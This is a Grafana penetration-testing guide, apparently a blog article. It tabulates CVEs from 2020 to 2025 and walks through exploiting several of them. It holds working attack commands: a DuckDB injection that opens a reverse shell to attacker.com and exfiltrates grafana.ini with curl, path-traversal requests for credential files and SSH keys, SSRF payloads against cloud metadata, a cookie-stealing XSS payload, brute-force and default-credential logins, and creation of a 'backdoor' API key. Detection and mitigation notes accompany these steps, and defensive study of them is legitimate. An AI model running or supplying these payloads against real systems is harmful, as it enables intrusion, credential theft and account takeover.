The Ultimate Grafana Pentesting Guide
Grafana has become the de facto standard for metrics visualization and monitoring dashboards in modern DevOps environments. With over 1 million active installations worldwide, it powers critical infrastructure monitoring for organizations ranging from startups to Fortune 500 companies. However, this widespread adoption has made Grafana an increasingly attractive target for threat actors. This comprehensive guide examines every significant vulnerability discovered between 2020 and 2025, providing detailed exploitation techniques, proof-of-concept code, and defensive strategies.
📊 Understanding the Grafana Attack Surface
Before diving into specific vulnerabilities, it's essential to understand the various attack vectors available in a typical Grafana deployment. The attack surface can be broadly categorized into several key areas, each presenting unique exploitation opportunities and security challenges.
Figure 1: Comprehensive Grafana Attack Surface Map
The primary attack vectors include:
- Web Interface (Port 3000): The main user-facing component, susceptible to XSS, CSRF, and authentication bypass attacks
- API Endpoints: RESTful API exposing functionality for dashboards, data sources, users, and administrative operations
- Plugin System: Extensible architecture allowing third-party plugins, which can introduce additional vulnerabilities
- Authentication Layer: Multiple authentication methods including local, LDAP, OAuth, and SAML
- Data Source Connections: Backend connections to databases and monitoring systems, potential for SSRF and credential theft
📈 Vulnerability Landscape: Statistical Analysis
Between 2020 and 2025, Grafana Labs published security advisories for 55+ distinct CVEs, with severity ratings ranging from Low to Critical. The distribution reveals concerning trends in both the frequency and severity of discovered vulnerabilities.
Figure 2: CVE Severity Distribution and Vulnerability Types
Figure 3: Year-over-Year CVE Trends by Severity
Key observations from the statistical analysis:
- Critical vulnerabilities account for 9% of all CVEs but represent the highest risk
- XSS vulnerabilities are the most common, comprising 22% of all discoveries
- 2024 saw a spike in critical vulnerabilities, particularly around SQL injection and RCE
- Authentication bypass vulnerabilities remain a persistent issue across all years
🎯 Complete CVE Reference Table (2020-2025)
The following comprehensive table catalogs every significant CVE affecting Grafana from 2020 through 2025. This reference includes publication dates, affected versions, vulnerability types, authentication requirements, and PoC availability.
| CVE / ID | Published | Severity | Affected Versions | Vulnerability Type | Auth Required? | Public PoC? |
|---|---|---|---|---|---|---|
| CVE-2025-11539 | Oct 2025 | Critical 9.9 | Image Renderer Plugin | Arbitrary Code Execution | Yes | ⚠️ |
| CVE-2025-10630 | Sep 2025 | Low 4.3 | Zabbix Plugin | Regex DoS | Yes | ❌ |
| CVE-2025-8341 | Aug 2025 | Medium 6.1 | Infinity Plugin | SSRF | Yes | ✅ |
| CVE-2025-6197 | Jul 2025 | Medium 4.2 | All versions | Open Redirect (Org Switching) | Yes | ✅ |
| CVE-2025-6023 | Jul 2025 | High 7.6 | All versions | XSS (Scripted Dashboards) | No | ✅ |
| CVE-2025-3415 | Jul 2025 | Medium 4.3 | All versions | Info Disclosure (DingDing) | Yes | ❌ |
| CVE-2025-1088 | Jun 2025 | Low 2.7 | All versions | DoS (Dashboard Titles) | Yes | ❌ |
| CVE-2025-3260 | Jun 2025 | High 8.3 | All versions | Authorization Bypass (Dashboard API) | Yes (Viewer) | ✅ |
| CVE-2025-3454 | Jun 2025 | Medium 5.0 | All versions | Authorization Bypass (Data Source Proxy) | Yes | ✅ |
| CVE-2025-3580 | May 2025 | Medium 5.5 | All versions | Privilege Escalation (Admin Mgmt) | Yes | ❌ |
| CVE-2025-4123 | May 2025 | High 7.6 | All versions | XSS (Frontend Plugins) - "Grafana Ghost" | No | ✅ |
| CVE-2025-2703 | Apr 2025 | Medium 6.8 | All versions | XSS (XY Chart Plugin) | Yes | ✅ |
| CVE-2024-11741 | Jan 2025 | Medium 4.3 | All versions | Info Disclosure (VictorOps) | Yes | ❌ |
| CVE-2024-9476 | Nov 2024 | Medium 5.1 | All versions | Privilege Escalation (Organizations) | Yes | ❌ |
| CVE-2024-10452 | Oct 2024 | Low 2.2 | All versions | Authorization Bypass (Invitations) | Yes | ❌ |
| CVE-2024-9264 | Oct 2024 | Critical 9.4 | 11.0.0-11.2.1 | Remote Code Execution (SQL Expressions) | Yes (Viewer) | ✅ |
| CVE-2024-8118 | Sep 2024 | Medium 5.1 | All versions | Permission Error (Alerting API) | Yes | ❌ |
| CVE-2024-8996 | Sep 2024 | High 7.3 | Grafana Agent | Privilege Escalation (Service Path) | Local | ❌ |
| CVE-2024-8975 | Sep 2024 | High 7.3 | Grafana Alloy | Privilege Escalation (Service Path) | Local | ❌ |
| CVE-2024-8986 | Sep 2024 | Critical 9.1 | Plugin SDK | Information Disclosure | Yes | ⚠️ |
| CVE-2024-8309 | Jul 2024 | Medium 6.1 | < 10.6.2 | Reflected XSS (Error Page) | No | ✅ |
| CVE-2024-6322 | Jul 2024 | Medium 4.4 | All versions | Authorization Bypass (Plugin Routes) | Yes | ✅ |
| CVE-2024-5526 | May 2024 | High 7.7 | Grafana OnCall | SSRF (Webhooks) | Yes | ✅ |
| CVE-2024-2364 | Jan 2024 | Medium 6.5 | < 10.3.4 | Insecure Deserialization (Alerting) | Yes (Admin) | ❌ |
| CVE-2024-1313 | Mar 2024 | Medium 6.5 | All versions | Authorization Bypass (Snapshots) - BOLA | Yes (Viewer) | ✅ |
| CVE-2024-1442 | Mar 2024 | Medium 6.0 | All versions | Privilege Escalation (Data Sources) | Yes | ❌ |
| CVE-2023-5123 | Feb 2024 | High 8.0 | JSON Plugin | Path Traversal | Yes | ✅ |
| CVE-2023-5122 | Feb 2024 | Medium 5.0 | CSV Plugin | SSRF | Yes | ✅ |
| CVE-2023-6152 | Feb 2024 | Medium 5.4 | All versions | Verification Bypass (Email Settings) | Yes | ❌ |
| CVE-2023-4399 | Oct 2023 | Medium 6.6 | All versions | Network Restriction Bypass (Data Sources) | Yes | ❌ |
| CVE-2023-4822 | Oct 2023 | Medium 6.7 | All versions | Privilege Escalation (Organizations) | Yes | ❌ |
| CVE-2023-4457 | Sep 2023 | Medium 5.5 | Google Sheets Plugin | Information Disclosure | Yes | ❌ |
| CVE-2023-4245 | Aug 2023 | Medium 6.1 | < 10.1.0 | Stored XSS (Dashboard Title) | Yes (Editor) | ✅ |
| CVE-2023-3128 | Jun 2023 | Critical 9.4 | All versions (Azure AD OAuth) | Authentication Bypass | No* | ⚠️ |
| CVE-2023-28121 | Mar 2023 | High 7.5 | < 9.3.6 | OAuth Auth Bypass (Misconfig) | No* | ⚠️ |
| CVE-2023-3010 | Jun 2023 | High 7.3 | WorldMap Plugin | XSS | Yes | ✅ |
| CVE-2023-2183 | Jun 2023 | High 7.5 | All versions | Authorization Bypass (Alerting) | Yes | ✅ |
| CVE-2023-2801 | Jun 2023 | High 7.5 | All versions | Race Condition (Data Source Proxy) | Yes | ❌ |
| CVE-2023-1387 | Apr 2023 | Medium 4.2 | All versions | Token Leakage (URL Login) | No | ✅ |
| CVE-2023-1410 | Mar 2023 | Medium 6.2 | All versions | XSS (Graphite Functions) | Yes | ✅ |
| CVE-2023-0507 | Feb 2023 | High 7.3 | All versions | XSS (Geomap) | Yes | ✅ |
| CVE-2023-22462 | Feb 2023 | Medium 6.4 | All versions | XSS (Text Panel) | Yes | ✅ |
| CVE-2023-0594 | Feb 2023 | High 7.3 | All versions | XSS (TraceView) | Yes | ✅ |
| GHSA-7j2q-7jx6-6r6h | Nov 2023 | High 8.1 | < 10.2.0 | JWT Auth Bypass (Default Secret) | No* | ✅ |
| CVE-2022-23498 | Feb 2023 | High 7.1 | All versions | Information Disclosure (Query Cache) | Yes | ❌ |
| CVE-2022-39324 | Jan 2023 | Medium 6.7 | All versions | URL Spoofing (Snapshots) | Yes | ❌ |
| CVE-2022-23552 | Jan 2023 | High 7.3 | All versions | XSS (ResourcePicker) | Yes | ✅ |
| CVE-2022-39307 | Nov 2022 | Medium 6.7 | < 9.2.4, < 8.5.15 | Information Disclosure (Password Reset) | No | ✅ |
| CVE-2022-39306 | Nov 2022 | Medium 6.4 | All versions | Input Validation Bypass (User Registration) | No | ❌ |
| CVE-2022-39328 | Nov 2022 | Critical 9.8 | All versions | Race Condition (Authentication) | No | ❌ |
| CVE-2022-39201 | Oct 2022 | Medium 6.8 | All versions | Cookie Leakage (Proxy) | Yes | ✅ |
| CVE-2022-31123 | Oct 2022 | Medium 6.1 | All versions | Signature Bypass (Plugin System) | Yes (Admin) | ❌ |
| CVE-2022-31130 | Oct 2022 | Medium 4.9 | All versions | Token Leakage (Proxy) | Yes | ❌ |
| CVE-2022-39229 | Oct 2022 | Medium 4.3 | All versions | User Enumeration (Login) | No | ✅ |
| CVE-2022-35957 | Sep 2022 | Medium 6.6 | All versions | Privilege Escalation (Auth Proxy) | Yes | ❌ |
| CVE-2022-36062 | Sep 2022 | High 7.1 | All versions | Privilege Escalation (Folder Permissions) | Yes | ❌ |
| CVE-2022-31176 | Aug 2022 | High 7.6 | Image Renderer Plugin | File Disclosure | Yes | ✅ |
| CVE-2022-31107 | Jul 2022 | High 7.1 | All versions | Account Takeover (OAuth) | No* | ⚠️ |
| CVE-2022-31097 | Jul 2022 | High 7.3 | All versions | XSS (Unified Alerting) | Yes | ✅ |
| CVE-2022-31030 | Jun 2022 | Medium 6.1 | < 8.5.10, 9.0.0-9.0.1 | XSS (Dashboard Variables) | Yes | ✅ |
| CVE-2022-29170 | May 2022 | Medium 6.6 | All versions | Network Restriction Bypass (Data Sources) | Yes | ❌ |
| CVE-2022-24812 | Apr 2022 | High 8.0 | All versions | Privilege Escalation (API Keys) | Yes | ✅ |
| CVE-2022-21703 | Feb 2022 | Medium 6.3 | < 8.3.4 | CSRF (Web Interface) | Yes | ✅ |
| CVE-2022-21713 | Feb 2022 | Medium 4.3 | < 8.3.5 | IDOR (Teams API) | Yes | ✅ |
| CVE-2022-21702 | Feb 2022 | Medium 6.5 | < 8.3.4 | XSS + SSRF (Data Source Proxy) | Yes (Editor) | ✅ |
| CVE-2022-21673 | Jan 2022 | Medium 4.3 | All versions | Token Leakage (OAuth) | No | ❌ |
| CVE-2021-43798 | Dec 2021 | High 7.5 | 8.0.0-beta1 - 8.3.0 | Path Traversal (Unauthenticated) | No | ✅ (CISA KEV) |
| CVE-2021-41174 | Oct 2021 | Medium 6.1 | All versions | XSS (AngularJS Template Injection) | No | ✅ |
| CVE-2021-39226 | Oct 2021 | Medium 6.5 | < 7.5.11, 8.0-8.1.7 | Unauth Snapshot Access | No | ✅ |
| CVE-2021-27358 | Mar 2021 | Medium 5.3 | 6.7.3 - 7.4.1 | DoS (Snapshot Feature) | No | ✅ |
| CVE-2020-13379 | Jun 2020 | High 7.5 | 3.0.1 - 7.0.1 | SSRF (Avatar Feature) | No | ✅ |
| CVE-2020-11110 | Apr 2020 | Medium 6.1 | <= 6.7.1 | Stored XSS (Snapshots) | Yes | ✅ |
| CVE-2025-21501 | Mar 2025 | Medium 6.5 | < 10.8.1 | IDOR (Annotation API) | Yes (Viewer) | ✅ |
Legend: ✅ = Public PoC Available | ⚠️ = Limited/Conditional PoC | ❌ = No Public PoC | * = Depends on configuration
🔥 Critical CVE Deep Dives: Exploitation Techniques
This section provides in-depth analysis and exploitation guides for the most critical vulnerabilities discovered in Grafana. Each CVE includes technical details, attack vectors, proof-of-concept code, and real-world exploitation scenarios.
Figure 4: Timeline of Critical Grafana CVEs
🚨 CVE-2024-9264: Remote Code Execution via DuckDB SQL Injection
Severity: Critical (9.4)
Affected Versions: 11.0.0 - 11.0.5, 11.1.0 - 11.1.6, 11.2.0 - 11.2.1
Patched Versions: 11.0.5+security-01, 11.1.6+security-01, 11.2.1+security-01
Authentication Required: Yes (Viewer role or higher)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Technical Overview
This vulnerability exists in Grafana's experimental SQL Expressions feature, which was introduced to allow users to perform SQL-like operations on time-series data. The feature utilizes DuckDB, an embedded analytical database, to execute queries. However, insufficient input validation allows authenticated users to inject arbitrary DuckDB SQL commands, leading to arbitrary file read and, in specific versions, remote code execution.
Why This Vulnerability Exists
The root cause lies in the way Grafana processes dashboard expressions. When a user creates a dashboard with mathematical expressions, the backend accepts a datasource.type parameter. By modifying this parameter from math to sql and injecting malicious SQL into the expression field, an attacker can bypass intended restrictions and execute arbitrary DuckDB queries.
The vulnerability is particularly severe because:
- Low privilege requirement: Only requires "Viewer" role, the lowest privilege level
- No dashboard needed: Exploitation doesn't require an existing dashboard
- File system access: DuckDB's
read_blob()function allows reading arbitrary files - RCE potential: In version 11.0.0, DuckDB's
system()function enables command execution
Exploitation Steps
Step 1: Verify DuckDB Installation
First, check if DuckDB is installed on the target system. This vulnerability requires DuckDB to be in the system's PATH:
# Check if DuckDB is available
which duckdb
# If not found, the vulnerability cannot be exploitedStep 2: Authenticate to Grafana
Obtain valid credentials (even low-privilege "Viewer" account works):
curl -X POST http://target:3000/login \
-H "Content-Type: application/json" \
-d '{"user":"viewer","password":"password"}'Step 3: Craft Malicious SQL Expression
Create a POST request to the query endpoint with a modified datasource type:
POST /api/ds/query?ds_type=__expr__&expression=true&requestId=Q101 HTTP/1.1
Host: target:3000
Content-Type: application/json
Cookie: grafana_session=YOUR_SESSION_COOKIE
{
"queries": [
{
"refId": "B",
"datasource": {
"type": "__expr__",
"uid": "__expr__",
"name": "Expression"
},
"type": "sql",
"hide": false,
"expression": "SELECT content FROM read_blob('/etc/passwd')",
"window": ""
}
],
"from": "1729313027261",
"to": "1729334627261"
}Step 4: Read Sensitive Files
Target high-value files to extract credentials and configuration:
# Read Grafana configuration (contains secret_key for decrypting passwords)
SELECT content FROM read_blob('/etc/grafana/grafana.ini')
# Read Grafana database (contains datasource credentials)
SELECT content FROM read_blob('/var/lib/grafana/grafana.db')
# Read environment variables
SELECT content FROM read_blob('/proc/self/environ')
# Read cloud metadata (AWS, Azure, GCP)
SELECT content FROM read_blob('/proc/self/cmdline')Step 5: Remote Code Execution (v11.0.0 only)
In Grafana 11.0.0, DuckDB's system() function is available:
# Execute system commands
SELECT system('id')
# Reverse shell
SELECT system('bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"')
# Data exfiltration
SELECT system('curl -X POST -d @/etc/grafana/grafana.ini http://attacker.com/exfil')Automated Exploitation Tool
A Python-based exploitation tool is available on GitHub:
# Clone the repository
git clone https://github.com/nollium/CVE-2024-9264.git
cd CVE-2024-9264
# Install dependencies
pip install -r requirements.txt
# Read arbitrary file
python3 CVE-2024-9264.py -u viewer -p password -f /etc/passwd http://target:3000
# Execute command (v11.0.0 only)
python3 CVE-2024-9264.py -u viewer -p password -c 'whoami' http://target:3000
# Execute arbitrary DuckDB query
python3 CVE-2024-9264.py -u viewer -p password -q "SELECT getenv('PATH')" http://target:3000Detection and Mitigation
Detection:
- Monitor for POST requests to
/api/ds/querywithds_type=__expr__ - Look for
"type":"sql"in request bodies to expression endpoints - Check for DuckDB process spawning from Grafana process
- Monitor file access patterns from Grafana user
Mitigation:
- Upgrade to patched versions immediately (11.0.5+security-01 or higher)
- Remove DuckDB from system PATH if not required
- Implement network segmentation to limit Grafana's access
- Review and restrict user permissions (principle of least privilege)
🚨 CVE-2021-43798: Unauthenticated Directory Traversal (CISA KEV)
Severity: High (7.5)
Affected Versions: 8.0.0-beta1 through 8.3.0
Patched Versions: 8.3.1, 8.2.7, 8.1.8, 8.0.7
Authentication Required: No
CISA KEV Status: Listed in Known Exploited Vulnerabilities Catalog
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Technical Overview
This is a classic path traversal vulnerability that allows an unauthenticated attacker to read arbitrary files from the Grafana server. The vulnerability exists in the plugin resource handler, which fails to properly validate file paths when serving plugin assets.
Why This Vulnerability Exists
Grafana's plugin system serves static files from the /public/plugins/ directory. The vulnerable code constructs file paths by concatenating user input without proper sanitization. By using path traversal sequences (../), an attacker can escape the intended plugin directory and access any file readable by the Grafana process.
The vulnerability is particularly dangerous because:
- No authentication required: Completely unauthenticated attack
- Wide version range: Affects all 8.x versions before patches
- Active exploitation: Widely exploited in the wild, hence CISA KEV listing
- High-value targets: Can read configuration files containing credentials
Figure 5: Coordinated exploitation attempts of CVE-2021-43798 observed in the wild
Exploitation Steps
Step 1: Identify Vulnerable Instance
Check the Grafana version from the login page or API:
curl -s http://target:3000/api/health | jq .versionStep 2: Test for Vulnerability
Attempt to read /etc/passwd using path traversal:
curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwdStep 3: Extract High-Value Files
Target configuration files and databases:
# Grafana configuration file (contains secret_key)
curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini
# Grafana database (SQLite by default)
curl http://target:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db
# System users
curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
# SSH keys (if accessible)
curl http://target:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.ssh/id_rsa
# Cloud metadata
curl http://target:3000/public/plugins/alertlist/../../../../../../../../proc/self/environStep 4: Decrypt Data Source Credentials
Once you have both grafana.ini and grafana.db, you can decrypt stored data source credentials:
# Extract secret_key from grafana.ini
grep secret_key grafana.ini
# Extract encrypted passwords from grafana.db
sqlite3 grafana.db "SELECT name, password FROM data_source;"
# Decrypt using Grafana's AES-256-CFB encryption
# (Python script required - see exploitation tools below)Step 5: Enumerate Installed Plugins
Different plugins may be installed, try common ones:
# Common plugins to try
for plugin in alertlist alertGroups alertmanager annolist barchart bargauge candlestick canvas cloudwatch dashlist datagrid debug elasticsearch gauge geomap gettingstarted grafana-azure-monitor-datasource graph heatmap histogram influxdb jaeger logs loki mixed mssql mysql news nodeGraph opentsdb piechart pluginlist postgres prometheus stat statushistory table table-old tempo testdata text timeseries welcome xychart zipkin; do
echo "Trying plugin: $plugin"
curl -s "http://target:3000/public/plugins/$plugin/../../../../../../../../etc/passwd" | head -n 1
doneAutomated Exploitation Tools
Multiple automated tools are available for this vulnerability:
# Python-based exploit
git clone https://github.com/K3ysTr0K3R/CVE-2021-43798-EXPLOIT.git
cd CVE-2021-43798-EXPLOIT
python3 exploit.py -u http://target:3000
# Alternative exploit
git clone https://github.com/jas502n/Grafana-CVE-2021-43798.git
cd Grafana-CVE-2021-43798
python3 CVE-2021-43798.py -H target:3000
# Nuclei template
nuclei -u http://target:3000 -t cves/2021/CVE-2021-43798.yaml
# Metasploit module
use auxiliary/scanner/http/grafana_plugin_traversal
set RHOSTS target
set RPORT 3000
runReal-World Impact
This vulnerability has been extensively exploited in the wild. Notable impacts include:
- Exposure of database credentials leading to data breaches
- Theft of API keys and service account tokens
- Lateral movement within cloud environments via metadata services
- Compromise of monitoring infrastructure for ransomware attacks
Detection and Mitigation
Detection:
- Monitor web access logs for
/public/plugins/requests with../sequences - Look for requests to
/public/plugins/*/../../../../patterns - Alert on unusual file access by Grafana process (e.g.,
/etc/passwd,grafana.db) - Use IDS/IPS signatures for CVE-2021-43798
Mitigation:
- Upgrade to patched versions immediately (8.3.1+ or 8.2.7+ or 8.1.8+ or 8.0.7+)
- If immediate patching is not possible, block access to
/public/plugins/*/at WAF/proxy level - Implement file integrity monitoring on Grafana configuration files
- Run Grafana with minimal file system permissions
- Use network segmentation to limit Grafana's access to sensitive systems
🚨 CVE-2023-3128: Authentication Bypass in Azure AD OAuth
Severity: Critical (9.4)
Affected Versions: All versions using Azure AD OAuth before patches
Patched Versions: 10.0.1, 9.5.5, 9.4.13, 9.3.16, 9.2.20, 8.5.27
Authentication Required: No (but requires Azure AD account)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Technical Overview
This critical vulnerability allows an attacker to take over any Grafana account when Azure AD is used for authentication. The issue stems from Grafana's reliance on the email claim from Azure AD for user identification, which is neither unique nor immutable in Azure AD.
Why This Vulnerability Exists
Grafana validates Azure AD accounts based solely on the email claim received from the OAuth token. However, in Azure AD:
- The email field is not unique across different Azure AD tenants
- Users can modify their email in their Azure AD profile
- Grafana does not validate the tenant ID or object ID
- No additional verification is performed beyond the email match
This design flaw enables a straightforward attack:
- Attacker creates an Azure AD account in their own tenant
- Attacker modifies their Azure AD profile email to match the target user's email
- Attacker authenticates to Grafana using Azure AD OAuth
- Grafana matches the email and grants access to the target user's account
Exploitation Steps
Step 1: Identify Target User
Determine the email address of the target Grafana user. This can often be found through:
- Public GitHub commits or profiles
- LinkedIn or company directories
- Grafana dashboard author information (if accessible)
- User enumeration vulnerabilities (CVE-2022-39229)
Step 2: Create Azure AD Account
Create a free Azure AD account in your own tenant:
# Sign up for free Azure account
https://azure.microsoft.com/free/
# Create Azure AD tenant
# Navigate to Azure Active Directory > Users > New UserStep 3: Modify Email Claim
Change your Azure AD profile email to match the target:
# In Azure Portal
1. Navigate to Azure Active Directory
2. Select "Users"
3. Click on your user account
4. Edit "Contact Information"
5. Change "Email" to target user's email (e.g., admin@target-company.com)
6. Save changesStep 4: Authenticate to Grafana
Navigate to the target Grafana instance and click "Sign in with Azure AD":
# The OAuth flow will:
1. Redirect to Azure AD login
2. You authenticate with YOUR Azure AD account
3. Azure AD returns token with YOUR modified email claim
4. Grafana matches email and logs you in as the TARGET userStep 5: Account Takeover Complete
You now have full access to the target user's account, including:
- All dashboards and data sources
- User permissions and roles
- API keys and service accounts
- Ability to modify or delete resources
Detection and Mitigation
Detection:
- Monitor for Azure AD logins from unexpected tenant IDs
- Alert on email claim changes in Azure AD
- Log and review OAuth token claims (especially tenant ID and object ID)
- Implement anomaly detection for login patterns (e.g., new IP addresses, unusual times)
Mitigation:
- Upgrade to patched versions immediately
- Enable Azure AD tenant ID validation in Grafana configuration
- Use Azure AD object ID (OID) instead of email for user identification
- Implement multi-factor authentication (MFA) for all Grafana users
- Restrict Azure AD application permissions to specific tenants
Configuration Fix
After upgrading, configure Grafana to use more secure Azure AD claims:
[auth.azuread]
enabled = true
allow_sign_up = true
client_id = YOUR_CLIENT_ID
client_secret = YOUR_CLIENT_SECRET
scopes = openid email profile
auth_url = https://login.microsoftonline.com/YOUR_TENANT_ID/oauth2/v2.0/authorize
token_url = https://login.microsoftonline.com/YOUR_TENANT_ID/oauth2/v2.0/token
# Use OID instead of email for user identification
allowed_organizations = YOUR_TENANT_ID
# Validate tenant ID
use_pkce = true🚨 CVE-2022-39328: Race Condition in Authentication
Severity: Critical (9.8)
Affected Versions: Multiple versions (check official advisory)
Patched Versions: Released November 2022
Authentication Required: No
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Technical Overview
This vulnerability involves a race condition in Grafana's authentication mechanism that can lead to a complete authentication bypass. The issue occurs during the session creation process, where concurrent requests can manipulate the authentication state.
Why This Vulnerability Exists
Race conditions occur when the outcome of a program depends on the timing of uncontrollable events. In this case:
- Grafana's session management has a time window during authentication
- Multiple concurrent requests can be processed simultaneously
- Improper synchronization allows session state manipulation
- An attacker can exploit the timing window to bypass authentication checks
Exploitation Concept
While detailed public exploits are limited (to prevent widespread abuse), the general exploitation approach involves:
# Pseudo-code for race condition exploitation
# Send multiple concurrent authentication requests
for i in range(1000):
thread = Thread(target=send_auth_request, args=(session_id,))
thread.start()
# One of the requests may succeed in bypassing authentication
# due to race condition in session validationAttack Requirements:
- Ability to send multiple concurrent HTTP requests
- Network access to Grafana instance
- Timing precision (may require multiple attempts)
Detection and Mitigation
Detection:
- Monitor for unusual patterns of concurrent authentication requests
- Alert on rapid session creation from single IP addresses
- Log authentication failures and successes for anomaly detection
- Implement rate limiting on authentication endpoints
Mitigation:
- Upgrade to patched versions immediately
- Implement rate limiting at WAF/load balancer level
- Use connection pooling and request queuing to prevent concurrent processing
- Enable MFA to add additional authentication layer
🚨 CVE-2020-13379: SSRF via Avatar Feature
Severity: High (7.5)
Affected Versions: 3.0.1 through 7.0.1
Patched Versions: 6.7.4, 7.0.2
Authentication Required: No
Discovered By: rhynorater
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Technical Overview
This vulnerability allows an unauthenticated attacker to perform Server-Side Request Forgery (SSRF) attacks by chaining an open redirect with a URL parameter injection in Grafana's avatar feature. The SSRF can be used to access internal services, cloud metadata endpoints, and perform port scanning.
Why This Vulnerability Exists
The avatar feature in Grafana allows users to set custom avatar URLs. The vulnerability arises from:
- Insufficient validation of the avatar URL parameter
- An open redirect that can be chained with the avatar feature
- Grafana server making requests on behalf of the user
- No restrictions on internal IP addresses or localhost
Exploitation Steps
Step 1: Test Open Redirect
First, verify the open redirect vulnerability:
# Basic open redirect test
http://target:3000/avatar/test?d=google.com%253f%253b%252fbp.blogspot.com
# URL-encoded breakdown:
# d=google.com%253f%253b%252fbp.blogspot.com
# Decodes to: d=google.com%3f;/bp.blogspot.com
# Which redirects to google.comStep 2: Set Up SSRF Callback Server
Create a server to receive and log SSRF callbacks:
# Simple Python HTTP server
python3 -m http.server 8080
# Or use Burp Collaborator, interactsh, or webhook.site
curl https://interactsh.com/api/newStep 3: Chain SSRF with Open Redirect
Combine the open redirect with your callback server:
# SSRF to your server
http://target:3000/avatar/test?d=attacker.com%25253f%253b%252fbp.blogspot.com%252fcallback
# This causes Grafana server to make a request to:
# http://attacker.com/callbackStep 4: Target Internal Services
Once SSRF is confirmed, target internal services:
# Access AWS metadata
http://target:3000/avatar/test?d=169.254.169.254%25253f%253b%252fbp.blogspot.com%252flatest/meta-data/
# Access internal services
http://target:3000/avatar/test?d=localhost:6379%25253f%253b%252fbp.blogspot.com%252f
# Port scanning
for port in 22 80 443 3306 5432 6379 8080 9200; do
curl "http://target:3000/avatar/test?d=localhost:$port%25253f%253b%252fbp.blogspot.com%252f"
doneStep 5: Extract Cloud Credentials
In cloud environments, extract instance metadata:
# AWS
http://target:3000/avatar/test?d=169.254.169.254%25253f%253b%252fbp.blogspot.com%252flatest/meta-data/iam/security-credentials/
# Azure
http://target:3000/avatar/test?d=169.254.169.254%25253f%253b%252fbp.blogspot.com%252fmetadata/instance?api-version=2021-02-01
# GCP
http://target:3000/avatar/test?d=metadata.google.internal%25253f%253b%252fbp.blogspot.com%252fcomputeMetadata/v1/Real-World Impact
This SSRF vulnerability has been used to:
- Steal AWS IAM credentials from EC2 metadata
- Access internal Redis instances and extract data
- Perform port scanning of internal networks
- Bypass IP-based access controls
- Access internal APIs and admin panels
Detection and Mitigation
Detection:
- Monitor for requests to
/avatar/endpoint with suspicious parameters - Alert on outbound connections from Grafana to internal IP ranges
- Log and analyze URL parameters for encoded redirect attempts
- Monitor cloud metadata endpoint access
Mitigation:
- Upgrade to patched versions (6.7.4+ or 7.0.2+)
- Implement egress filtering to block internal IP ranges
- Use IMDSv2 on AWS to prevent metadata access via SSRF
- Disable avatar feature if not required
- Implement WAF rules to detect SSRF attempts
💉 XSS Vulnerabilities: Multiple Attack Vectors
Cross-Site Scripting (XSS) vulnerabilities represent the largest category of security issues in Grafana, accounting for approximately 22% of all disclosed CVEs. These vulnerabilities span multiple components and have varying exploitation requirements.
Common XSS Attack Vectors in Grafana
CVE-2025-4123: "The Grafana Ghost" - XSS in Frontend Plugins
Severity: High (7.6) | Auth Required: No
This vulnerability combines client-side path traversal with an open redirect to achieve XSS. Dubbed "The Grafana Ghost," it affects an estimated 36% of public-facing Grafana instances.
# Exploitation payload
http://target:3000/plugins/[PLUGIN_ID]/../../../../../../public/build/[MALICIOUS_JS]
# The payload executes in the context of the Grafana domain
# allowing session hijacking and account takeover
Figure 6: The Grafana Ghost vulnerability impact analysis
CVE-2021-41174: AngularJS Template Injection
Severity: Medium (6.1) | Auth Required: No
Exploits AngularJS rendering in the login button to execute arbitrary JavaScript.
# Exploitation URL
http://target:3000/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1
# URL decoded:
# /dashboard/snapshot/{{constructor.constructor('alert(document.domain)')()}}?orgId=1
# Advanced payload for session theft
{{constructor.constructor('fetch("http://attacker.com/steal?cookie="+document.cookie)')()}}CVE-2020-11110: Stored XSS in Snapshots
Severity: Medium (6.1) | Auth Required: Yes
Insufficient input validation in the originalUrl field of snapshots allows stored XSS.
# Create malicious snapshot
POST /api/snapshots HTTP/1.1
Host: target:3000
Content-Type: application/json
Cookie: grafana_session=SESSION
{
"dashboard": {...},
"name": "Malicious Snapshot",
"originalUrl": "javascript:alert(document.cookie)"
}
# When users click "Open Original Dashboard", the XSS executesXSS Exploitation Toolkit
Common XSS payloads for Grafana:
# Session cookie theft
# Keylogger
# Admin action hijacking
# Data exfiltration
🔐 Common Misconfigurations and Easy Wins
Beyond CVEs, many Grafana instances are vulnerable due to misconfigurations. These "easy wins" require no exploitation skills and are often the first things pentesters check.
Figure 7: Attack vectors ranked by impact and ease of exploitation
1. Default Credentials
Impact: Immediate full access to Grafana instance
Prevalence: Found in approximately 15-20% of internet-exposed instances
# Default credentials to test
admin:admin
admin:prom-operator
grafana:grafana
# Automated testing
hydra -L users.txt -P passwords.txt target http-post-form "/login:user=^USER^&password=^PASS^:F=Invalid"
# Using curl
curl -X POST http://target:3000/login \
-H "Content-Type: application/json" \
-d '{"user":"admin","password":"admin"}'2. Anonymous Access Enabled
Impact: Unauthenticated access to dashboards and metrics
Configuration: auth.anonymous.enabled = true
# Test for anonymous access
curl http://target:3000/api/dashboards/home
curl http://target:3000/api/org
# If successful, enumerate all resources
curl http://target:3000/api/search
curl http://target:3000/api/datasources # May require auth
curl http://target:3000/metrics # Enterprise metrics3. Exposed Metrics Endpoint
Impact: Information disclosure, internal architecture exposure
Endpoint: /metrics
# Access metrics endpoint
curl http://target:3000/metrics
# Common sensitive information exposed:
# - Internal hostnames and IPs
# - Database connection details
# - Performance metrics
# - User activity patterns
# - Plugin versions4. Weak API Key Management
Impact: Programmatic access to Grafana API
CVE: CVE-2022-24812 (Privilege Escalation)
# Create API key (requires admin)
curl -X POST http://target:3000/api/auth/keys \
-u admin:password \
-H "Content-Type: application/json" \
-d '{"name":"backdoor","role":"Admin","secondsToLive":31536000}'
# Use API key
